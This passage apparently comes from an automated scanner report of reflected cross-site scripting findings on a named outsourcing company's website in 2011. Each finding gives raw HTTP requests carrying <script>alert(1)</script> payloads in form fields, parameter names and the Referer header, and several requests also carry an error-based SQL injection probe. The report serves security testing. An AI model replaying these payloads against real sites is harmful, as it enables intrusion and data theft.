Content-Length: 5813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<form id="contactus" method="post" action="/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html?2e2d0"><script>alert(1)</script>a4a9133cc3c=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.2. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6be73"><script>alert(1)</script>aff530c79d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html?6be73"><script>alert(1)</script>aff530c79d5=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:43 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<form id="contactus" method="post" action="/Netsparker86454240ba544e4fbfaa35b725c93778.html?6be73"><script>alert(1)</script>aff530c79d5=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.3. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1df26"><script>alert(1)</script>93c674300a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html?1df26"><script>alert(1)</script>93c674300a9=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<form id="contactus" method="post" action="/Netsparkercfe7b9a5d67d488389828738d85656f2.html?1df26"><script>alert(1)</script>93c674300a9=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.4. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [1' parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the 1' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b27e9"><script>alert(1)</script>4d23a1ac00ff75721 was submitted in the 1' parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?1'=1b27e9"><script>alert(1)</script>4d23a1ac00ff75721&p_name=&p_email=&p_company=&p_telephone=&p_validator=&p_message&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html?1'=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<form id="contactus" method="post" action="/outsourcing-dot-net-development-contact-us.html?1'=1b27e9"><script>alert(1)</script>4d23a1ac00ff75721&p_name=&p_email=&p_company=&p_telephone=&p_validator=&p_message&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.5. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [1' parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the 1' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a12"><script>alert(1)</script>f628d40ec93 was submitted in the 1' parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /outsourcing-dot-net-development-contact-us.html?1'=197a12"><script>alert(1)</script>f628d40ec93 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=utttqj386ubgf1uorlg7us3l64; path=/
Content-Type: text/html
Content-Length: 7135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<form id="contactus" method="post" action="/outsourcing-dot-net-development-contact-us.html?1'=197a12"><script>alert(1)</script>f628d40ec93#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.6. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939df"><script>alert(1)</script>f55c31357e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /outsourcing-dot-net-development-contact-us.html?939df"><script>alert(1)</script>f55c31357e0=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<form id="contactus" method="post" action="/outsourcing-dot-net-development-contact-us.html?939df"><script>alert(1)</script>f55c31357e0=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.7. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c3e"><script>alert(1)</script>fe3a2ec8b31d79c4 was submitted in the p_company parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=320c3e"><script>alert(1)</script>fe3a2ec8b31d79c4&p_telephone=3&p_validator=3&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:21:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=320c3e"><script>alert(1)</script>fe3a2ec8b31d79c4&p_telephone=3&p_validator=3&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.8. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d63ec"><script>alert(1)</script>a8ee980eb769c8c5a was submitted in the p_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.comd63ec"><script>alert(1)</script>a8ee980eb769c8c5a&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:21:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.comd63ec"><script>alert(1)</script>a8ee980eb769c8c5a&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.9. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_message request parameter is copied into the HTML document as plain text between tags. The payload a76a3<script>alert(1)</script>e567405fb68 was submitted in the p_message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 366

p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3a76a3<script>alert(1)</script>e567405fb68&G=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:22:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<textarea name="p_message" type="text" cols="40" rows="6" realname="Message" style="border-style:solid;border-width:1px">3a76a3<script>alert(1)</script>e567405fb68</textarea>
...[SNIP]...
2.10. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0cd3"><script>alert(1)</script>321a32c008d855ef2 was submitted in the p_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))d0cd3"><script>alert(1)</script>321a32c008d855ef2&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:21:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))d0cd3"><script>alert(1)</script>321a32c008d855ef2&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.11. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_telephone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_telephone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c9b"><script>alert(1)</script>00f44728b6d855ec7 was submitted in the p_telephone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3e7c9b"><script>alert(1)</script>00f44728b6d855ec7&p_validator=3&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:21:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
5)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3e7c9b"><script>alert(1)</script>00f44728b6d855ec7&p_validator=3&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.12. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_validator parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the p_validator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c169"><script>alert(1)</script>c6c36cb51f697a71c was submitted in the p_validator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=32c169"><script>alert(1)</script>c6c36cb51f697a71c&p_message=3&G=Submit HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:22:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=32c169"><script>alert(1)</script>c6c36cb51f697a71c&p_message=3&G=Submit#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...
2.13. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 69b75<script>alert(1)</script>614e5863fb0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=69b75<script>alert(1)</script>614e5863fb0

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 6322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>614e5863fb0">69b75<script>alert(1)</script>614e5863fb0</a>
...[SNIP]...
2.14. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6094"><script>alert(1)</script>101d74c0fb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=c6094"><script>alert(1)</script>101d74c0fb1

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 6048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
